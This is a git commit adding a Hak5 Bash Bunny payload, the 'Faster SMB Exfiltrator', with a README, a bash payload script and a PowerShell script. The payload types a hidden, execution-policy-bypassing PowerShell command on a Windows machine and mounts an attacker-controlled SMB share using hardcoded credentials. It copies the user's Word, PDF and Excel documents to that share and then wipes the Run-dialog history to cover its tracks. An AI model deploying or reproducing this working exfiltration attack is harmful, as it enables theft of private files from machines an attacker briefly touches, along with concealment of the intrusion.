commit
50e3d0639f
|
@ -0,0 +1,50 @@
|
|||
# Faster SMB Exfiltrator V 2.0
|
||||
|
||||
* Author: Hak5Darren
|
||||
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||
* Version: Version 1.6.1
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmodes: HID, Ethernet
|
||||
|
||||
## Description
|
||||
|
||||
Exfiltrates select files from users's documents folder via SMB.
|
||||
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||
|
||||
## Configuration
|
||||
|
||||
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------- | -------------------------------------- |
|
||||
| Red (blinking) | Impacket not found in /pentest |
|
||||
| Yellow Single | Ethernet Stage |
|
||||
| Yellow Double | HID Stage |
|
||||
| Cyan | Receiving files |
|
||||
| White | Moving liberated files to mass storage |
|
||||
| Green | Finished |
|
||||
|
||||
# NOTICE
|
||||
|
||||
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||
|
||||
# Starting from a fresh Bash Bunny
|
||||
|
||||
1. apt update ; apt install gcc
|
||||
2. pip install impacket
|
||||
3. cd /tools/
|
||||
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||
|
||||
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||
|
||||
# Changes to the payload.txt include:
|
||||
|
||||
* Support for SMB version 2 enabled.
|
||||
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
@ -0,0 +1,85 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Faster SMB Exfiltrator version 2.0
|
||||
# Author: Hak5Darren
|
||||
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||
# Version: 1.6.1
|
||||
# Category: Exfiltration
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ============
|
||||
# SETUP:
|
||||
#
|
||||
# 1. apt update ; apt install gcc
|
||||
# 2. pip install impacket
|
||||
# 3. cd /tools/
|
||||
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
#
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# FAIL........Failed to find dependencies
|
||||
# STAGE1......Ethernet Stage
|
||||
# STAGE2......HID Stage
|
||||
# SPECIAL.....Receiving Files
|
||||
# CLEANUP.....Moving Liberated Files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Exfiltration options configured from included s.ps1 script
|
||||
|
||||
|
||||
######## INITIALIZATION ########
|
||||
REQUIRETOOL impacket
|
||||
GET SWITCH_POSITION
|
||||
# Make temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
# Delete any old exfiltration data
|
||||
rm -rf /loot/smb/*
|
||||
# Copy new powershell payload to smb share
|
||||
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||
# Make loot directory on USB Disk
|
||||
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||
|
||||
|
||||
######## ETHERNET STAGE ########
|
||||
LED STAGE1
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Start the SMB Server
|
||||
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||
|
||||
|
||||
######## HID STAGE ########
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||
GET HOST_IP
|
||||
LED STAGE2
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
RUN WIN powershell
|
||||
Q DELAY 1000
|
||||
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
LED SPECIAL
|
||||
# Wait until files are done copying
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
|
||||
######## CLEANUP ########
|
||||
LED CLEANUP
|
||||
# Delete EXFILTRATION_COMPLETE file
|
||||
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||
# Move files to udisk loot directory
|
||||
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/e/*
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
|
||||
######## FINISH ########
|
||||
# Trap is clean
|
||||
LED FINISH
|
|
@ -0,0 +1,9 @@
|
|||
$exfil_dir="$Env:UserProfile\Documents"
|
||||
$exfil_ext="*.docx"
|
||||
$exfil_ext1="*.pdf"
|
||||
$exfil_ext2="*.xlsx"
|
||||
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||
mkdir $loot_dir
|
||||
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
Loading…
Reference in New Issue